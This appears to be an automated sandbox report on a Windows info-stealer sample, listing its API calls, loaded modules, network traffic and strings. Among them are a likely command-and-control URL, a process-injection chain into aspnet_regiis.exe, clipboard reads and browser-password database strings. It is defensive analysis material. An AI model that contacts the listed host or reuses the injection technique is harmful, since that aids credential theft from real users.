Source: aspnet_regiis.exe, 00000002.00000003.1878990637.0000000000671000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1880269736.0000000000671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs:443/api
Source: aspnet_regiis.exe, 00000002.00000003.1731740518.0000000004C4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: aspnet_regiis.exe, 00000002.00000003.1775057294.0000000004D10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: aspnet_regiis.exe, 00000002.00000003.1775057294.0000000004D10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: aspnet_regiis.exe, 00000002.00000003.1731740518.0000000004C4C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731819034.0000000004C45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1752555209.0000000004C45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731925618.0000000004C45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1752661147.0000000004C45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: aspnet_regiis.exe, 00000002.00000003.1731819034.0000000004C20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: aspnet_regiis.exe, 00000002.00000003.1731740518.0000000004C4C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731819034.0000000004C45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1752555209.0000000004C45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731925618.0000000004C45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1752661147.0000000004C45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: aspnet_regiis.exe, 00000002.00000003.1731819034.0000000004C20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: aspnet_regiis.exe, 00000002.00000003.1775057294.0000000004D10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: aspnet_regiis.exe, 00000002.00000003.1775057294.0000000004D10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: aspnet_regiis.exe, 00000002.00000003.1775057294.0000000004D10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: aspnet_regiis.exe, 00000002.00000003.1775057294.0000000004D10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: aspnet_regiis.exe, 00000002.00000003.1775057294.0000000004D10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49746 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_00963550 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_00963550

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_00963550 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_00963550

System Summary

PE file contains section with special chars

Source: S#U043eftWare.exe

Static PE information: section name: :Mn-oI

PE file has nameless sections

Source: S#U043eftWare.exe

Static PE information: section name:

Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_6CDC86F0 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,NtGetContextThread,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,CloseHandle,CloseHandle,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,CloseHandle,NtGetContextThread,NtWriteVirtualMemory,		0_2_6CDC86F0
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_6CDC6BD0 GetModuleHandleW,NtQueryInformationProcess,GetModuleHandleW,		0_2_6CDC6BD0

Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_0054AC10	0_2_0054AC10
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_005310E0	0_2_005310E0
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_0051B890	0_2_0051B890
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_005438B0	0_2_005438B0
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_0051B540	0_2_0051B540
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_0054D940	0_2_0054D940
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_0052F110	0_2_0052F110
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_00531D30	0_2_00531D30
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_00532DF0	0_2_00532DF0
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_0051BDE0	0_2_0051BDE0
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_0052EE60	0_2_0052EE60
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_004F8B67	0_2_004F8B67
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_00549FE0	0_2_00549FE0
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_004F8B96	0_2_004F8B96
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_005183B0	0_2_005183B0
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_6CDC1400	0_2_6CDC1400
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_6CDC86F0	0_2_6CDC86F0
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_6CDC6BD0	0_2_6CDC6BD0
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_6CDC4810	0_2_6CDC4810
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_6CDC1000	0_2_6CDC1000
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_6CDC82A0	0_2_6CDC82A0
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_6CDD0660	0_2_6CDD0660
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_6CDDABE1	0_2_6CDDABE1
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Code function: 0_2_0054BDC0	0_2_0054BDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_009528A0	2_2_009528A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00954470	2_2_00954470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_009689D0	2_2_009689D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0096B100	2_2_0096B100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00957140	2_2_00957140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00950970	2_2_00950970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0093E2B2	2_2_0093E2B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0093D2C5	2_2_0093D2C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00938AE0	2_2_00938AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00970FB0	2_2_00970FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00939BA0	2_2_00939BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00948BE3	2_2_00948BE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00970740	2_2_00970740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00948490	2_2_00948490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00936CD0	2_2_00936CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00970CD0	2_2_00970CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00968000	2_2_00968000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00935C20	2_2_00935C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0094CC20	2_2_0094CC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00953450	2_2_00953450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0096F450	2_2_0096F450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00936840	2_2_00936840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0094AC64	2_2_0094AC64
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0093546B	2_2_0093546B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00938590	2_2_00938590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00957580	2_2_00957580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00954DB0	2_2_00954DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_009581BC	2_2_009581BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00967DA0	2_2_00967DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_009709F0	2_2_009709F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_009541E8	2_2_009541E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0094F510	2_2_0094F510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00956910	2_2_00956910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00959100	2_2_00959100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00934930	2_2_00934930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0094D53A	2_2_0094D53A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00933550	2_2_00933550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0096F550	2_2_0096F550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00956959	2_2_00956959
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00936170	2_2_00936170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0094B68E	2_2_0094B68E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0094EEA0	2_2_0094EEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0094CED0	2_2_0094CED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0094FAF0	2_2_0094FAF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00956630	2_2_00956630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00939650	2_2_00939650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0096C250	2_2_0096C250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0093DA43	2_2_0093DA43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00961670	2_2_00961670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00950BB0	2_2_00950BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_009583CA	2_2_009583CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0093AFE0	2_2_0093AFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00954BE2	2_2_00954BE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00949FED	2_2_00949FED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00939300	2_2_00939300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0094DF00	2_2_0094DF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0096B700	2_2_0096B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0096BB30	2_2_0096BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00932B20	2_2_00932B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00955344	2_2_00955344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00957774	2_2_00957774
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00933F60	2_2_00933F60

Source: C:\Users\user\Desktop\S#U043eftWare.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7624 -s 1228

Source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs S#U043eftWare.exe
Source: S#U043eftWare.exe, 00000000.00000000.1676874362.00000000005A0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameXeniaRubyEleanor.fIMmT vs S#U043eftWare.exe
Source: S#U043eftWare.exe	Binary or memory string: OriginalFilenameXeniaRubyEleanor.fIMmT vs S#U043eftWare.exe

Source: S#U043eftWare.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: S#U043eftWare.exe

Static PE information: Section: :Mn-oI ZLIB complexity 1.0003229166666667

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/7@1/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_009689D0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

2_2_009689D0

Source: C:\Users\user\Desktop\S#U043eftWare.exe

File created: C:\Users\user\AppData\Roaming\gdi32.dll

Jump to behavior

Source: C:\Users\user\Desktop\S#U043eftWare.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7624

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\c51e66c2-91b8-4a1b-acf9-6c8408be2621

Jump to behavior

Source: S#U043eftWare.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\S#U043eftWare.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: aspnet_regiis.exe, 00000002.00000003.1731576347.0000000004C24000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1752599016.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: S#U043eftWare.exe

ReversingLabs: Detection: 26%

Source: S#U043eftWare.exe	String found in binary or memory: -addpset
Source: S#U043eftWare.exe	String found in binary or memory: -addfulltrust
Source: S#U043eftWare.exe	String found in binary or memory: -addgroup
Source: S#U043eftWare.exe	String found in binary or memory: -help

Source: C:\Users\user\Desktop\S#U043eftWare.exe

File read: C:\Users\user\Desktop\S#U043eftWare.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\S#U043eftWare.exe "C:\Users\user\Desktop\S#U043eftWare.exe"
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7624 -s 1228
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"	Jump to behavior

Source: C:\Users\user\Desktop\S#U043eftWare.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\S#U043eftWare.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\S#U043eftWare.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\S#U043eftWare.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: S#U043eftWare.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: S#U043eftWare.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: %%.pdb source: S#U043eftWare.exe, 00000000.00000002.1997339628.000000000093A000.00000004.00000010.00020000.00000000.sdmp
